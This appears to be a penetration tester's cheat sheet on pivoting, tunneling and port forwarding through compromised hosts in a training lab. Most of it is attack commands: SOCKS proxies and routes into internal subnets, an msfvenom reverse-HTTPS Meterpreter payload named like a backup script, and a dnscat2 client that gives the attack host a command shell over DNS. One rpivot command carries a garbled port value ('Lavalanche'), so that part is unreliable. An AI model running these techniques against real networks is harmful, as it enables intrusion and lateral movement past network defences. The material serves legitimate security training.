Pivoting, Tunneling, and Port Forwarding

Introduction

• Pivoting is a technique that allows access to network segments beyond the initial compromised host. When valid credentials are obtained for a machine but the attack host cannot directly reach the target network, pivoting enables further exploration by routing traffic through the compromised system.

• Before diving into the techniques, let’s define the core terms:

  • Pivoting: Using a compromised host to access isolated networks, bypassing physical or virtual segmentation.

  • Tunneling: Encapsulating network traffic within another protocol to route it through a pivot host.

  • Port Forwarding: Redirecting traffic from one port to another, often used with tunneling to reach specific services.

• A strong understanding of networking fundamentals (e.g., TCP/IP, routing, and firewalls) is essential for successful pivoting.

SSH Port Forwarding

• SSH can be used for port forwarding, enabling both local and remote connections through a pivot host.

Local Port Forwarding

• Local port forwarding lets you connect a port on your attack machine to a service on a remote network via an SSH session. It’s perfect when you know exactly which ports you need to hit.

ssh -L <Local-Port>:localhost:<Remote-Port> <Username>@<IP-Address>
Example: ssh -L 1234:localhost:3306 ubuntu@10.129.202.64

• This forwards local port 1234 to the remote host’s port 3306. Multiple ports can be forwarded:

ssh -L 1234:localhost:3306 -L 8080:localhost:80 ubuntu@10.129.202.64

# Check using:
netstat -antp | grep 1234

Run commands:
nmap -v -sV -p1234 localhost

Dynamic Port Forwarding

• Dynamic port forwarding creates a SOCKS proxy for flexible scanning when target ports are unknown. Start with:

ssh -D 9050 ubuntu@10.129.202.64

• The -D flag enables a SOCKS listener on port 9050. Configure Proxychains by adding to /etc/proxychains.conf:socks4 127.0.0.1 9050

• Run commands through Proxychains:

# Example:
proxychains nmap -v -sn 172.16.5.1-200

Note: Proxychains supports only full TCP connect scans (-sT), as it cannot handle partial packets.

Remote (Reverse) Port Forwarding

• Remote port forwarding allows a remote host to connect back to the attack machine, useful for reverse shells. Use:

ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<IP-Address> -vN

• The -vN flags enable verbose output and prevent a login shell. This forwards traffic from the pivot’s port 8080 to the attack host’s port 8000.

Meterpreter Tunneling & Port Forwarding

• Meterpreter, part of Metasploit, supports pivoting without SSH. Set up a SOCKS proxy:

use auxiliary/server/socks_proxy
set SRVHOST 0.0.0.0
set SRVPORT 9050
set version 4a
run

# Remember to update proxychains config:
socks4 127.0.0.1 9050

# Then
use post/multi/manage/autoroute
set SESSION 1
set SUBNET 172.16.5.0
run

# Alternatively, from Meterpreter:
run autoroute -s 172.16.5.0/23

# List routes (To Check):
run autoroute -p

# Run commands using proxychains:
proxychains nmap 172.16.5.19 -p3389 -sT -v -Pn

• We can also do port forwarding using metasploit:

portfwd add -l 3300 -p 3389 -r 172.16.5.19

• This forwards local port 3300 to the target’s port 3389. You can then RDP: xfreerdp /v:localhost:3300 /u:victor /p:pass@123

• We can also do reverse portforwarding: portfwd add -R -l 8081 -p 1234 -L 10.10.14.18

Socat

• Socat is a bidirectional relay tool for tunneling without SSH.

# Forward traffic:
socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80

# Create a bind shell redirector:
socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443

# Generate a payload with msfvenom:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=8080

Additional Tools

Plink.exe

• Plink, part of PuTTY, enables SSH tunneling on Windows: plink -ssh -D 9050 ubuntu@10.129.15.50

• Use Proxifier to route traffic through the SOCKS proxy.

Sshuttle

• Sshuttle pivots over SSH without Proxychains: sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0/23 -v

Rpivot

• Rpivot creates a reverse SOCKS proxy. On the attack host: python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0

• Transfer Rpivot to the target: scp -r rpivot ubuntu@<IP-Address>:/home/ubuntu/

• On the target: python2.7 client.py --server-ip 10.10.14.18 --server-port Lavalanche

• Then run commands: curl --socks4 127.0.0.1:9050 172.16.5.135

Windows Netsh

• Netsh configures port forwarding on Windows: netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.42.198 connectport=3389 connectaddress=172.16.5.25

• You can verify using: netsh.exe interface portproxy show v4tov4

DNS Tunneling with Dnscat2

• Dnscat2 tunnels data via DNS. On the attack host: sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache

• On the target (Windows): Start-Dnscat2 -DNSserver 10.10.15.111 -Domain inlanefreight.local -PreSharedSecret <secret> -Exec cmd

SOCKS5 Tunneling with Chisel

• Chisel tunnels TCP/UDP over HTTP. On the pivot target: ./chisel server -v -p 1234 --socks5

• On the attack host: ./chisel client -v 10.129.202.64:1234 socks

• Update /etc/proxychains.conf: socks5 127.0.0.1 1080

• For reverse tunneling:

sudo ./chisel server --reverse -v -p 1234 --socks5
./chisel client -v 10.10.14.17:1234 R:socks

ICMP Tunneling with Ptunnel-ng

• Ptunnel-ng uses ICMP for tunneling. On the pivot: sudo ./ptunnel-ng -r10.129.202.64 -R22

• On the attack host: sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22

• SSH through the tunnel: ssh -p2222 -lubuntu 127.0.0.1

• For dynamic forwarding: ssh -D 9050 -p2222 -lubuntu 127.0.0.1

RDP Tunneling with SocksOverRDP

• SocksOverRDP tunnels over RDP. Register the DLL: regsvr32.exe SocksOverRDP-Plugin.dll

• Run SocksOverRDP-Server.exe on the target and configure Proxifier to forward traffic to 127.0.0.1:1080.